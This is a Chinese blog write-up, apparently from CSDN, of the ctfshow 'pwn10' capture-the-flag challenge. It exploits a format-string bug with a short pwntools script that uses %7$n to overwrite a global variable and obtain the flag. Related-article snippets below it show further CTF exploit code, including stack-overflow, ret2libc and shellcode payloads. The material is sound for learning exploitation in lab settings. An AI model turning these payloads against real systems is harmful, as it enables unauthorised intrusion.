ctfshow pwn10

最新推荐文章于 2024-07-26 15:25:27 发布
最新推荐文章于 2024-07-26 15:25:27 发布
阅读量476 收藏
点赞数 1
分类专栏: ctfshow pwn详细wp 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39980610/article/details/126465833
版权

checksec检查程序

32位nx保护

ida可以看到程序有格式化字符串漏洞,并且num=16就会给我们执行systm(“cat flag”)

查看num的位置

是 在bss段上的地址是0x804a30

运行程序确定偏移为7

那么我们该如何将num改写成16呢

需要用到的是

%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。
构造exp:
from pwn import*
r=remote("pwn.challenge.ctf.show",28195)
num_addr=0x804a030
payload=p32(num_addr)+b'a'*12+b'%7$n'
r.sendline(payload)
r.interactive()


tip:
payload为何要这样构造因为32位下地址占4字节,所以我们要补齐16字节,这样n就会把16写入num
至于大数要如何修改
用的就是hn 和hhn分别可以控制双字节和单字节写入例如a=0x 11 22 33 44
a__addr a_addr+1 ... 这样写入即可

whit233
关注
专栏目录
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 3555
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
ctfshow pwn
zip471642048的博客
06-04 497
ctfshow pwn系列
CTFshow PWN 格式化字符串漏洞pwn10
Rt1Text的博客
03-27 651
checksec+运行 就是这个样子 确实还需要学习啊 KEEP LEARNING!!!!!! 32位 NX保护 ida进行中 if num == 16 即可cat flag 那么修改变量的值 明显的格式化字符串漏洞 确定参数位置 第7个 num跟进去 address=0x804A030 准备exp from pwn import* p=process('./pwn10') num_addr=0x804A030 payload=p32(num_add..
CTFshow-PWN-前置基础(pwn10-pwn12)
Welcome To Myon'Blog !
04-16 472
寄存器相对寻址方式结束后eax寄存器的值为?在 ida 中找到对应汇编代码:双击跟进 dword_80490E8 ,得到这里 msg 的地址是:0x80490E8将该地址赋给寄存器 ecx接着使用 add 指令对 ecx 加 40x80490E8 对应十进制为 134516968因此 add 执行后,ecx 中值变为:134516972转为十六进制为:0x80490ec接下来是将 ecx 所指向的地址的值赋给 eaxecx 指向地址为 0x80490ec。
攻防世界XCTF-Pwn入门11题解题报告
最新发布
HUANGXIN9898的博客
07-26 770
Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
BUUCTF-pwn(10)
njh18790816639的博客
01-08 363
picoctf_2018_shellcode 题目很很简单! from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './PicoCTF_2018_shellcode' r = remote('node4.buuoj.cn',25585) #r = process(binary) elf = ELF(binary) shellcode = asm(shellcraft.sh()) r.recvunti
2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
qq_43264813的博客
10-12 898
2021年“莲城杯”网络安全大赛-PWN-pwn10 题目名称:pwn10 题目内容:栈溢出。靶机:nc 183.129.189.60 10016 题目分值:100.0 题目难度:容易 相关附件:pwn10的附件.zip 解题思路: 1.保护机制,静态链接,没pie 2.主要函数 3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall ```python #!/usr/bin/
ctfshow pwn4
qq_39980610的博客
08-22 685
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
ctfshow pwn7
qq_39980610的博客
08-22 540
pwn7
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5358
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
ctfshow pwn3
qq_39980610的博客
08-19 575
所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。然后接受到的地址就是程序在libc中的地址我们就可以确定libc的版本和libc基址。函数在libc中的偏移都是固定的我们可以通过基址加偏移拿到函数地址和binsh字段。然后我们再构造rop链。
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
CTFshow-webPWN
i_kei的博客
11-10 548
WEBpwn_1 将组件放置成如图所示 通电即可获得flag WEBpwn_2 将组件放置成如图所示 通电即可获得flag
[BUUCTF]PWN10——[第五空间2019 决赛]PWN5
u014377094的博客
01-26 1747
这一道题利用的是格式化字符串漏洞 首先checksec一下,发现是开了canary的32位程序 放入ida 我们可以看到,这是让我们将自己输入的密码和随机密码进行比对,当比对成功就会自己执行system。 先输入AAAA%08x...找到相应的位置。传送门:(2条消息) 格式化字符串漏洞原理详解_ditto的博客-CSDN博客_格式化字符串漏洞 payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047) payloa
ctfshow 基础pwn wp
n1ptune__的博客
05-29 729
PWN01 简单栈溢出,ret2text from pwn import * #p = process("./pwn1") p = remote(ip,port) p.recv() payload = 'a'*(0x9+4) + p32(0x0804850F) p.sendline(payload) p.interactive() PWN03 32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参 from pwn import * from LibcSearcher import *
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9645
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了栈溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6246
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值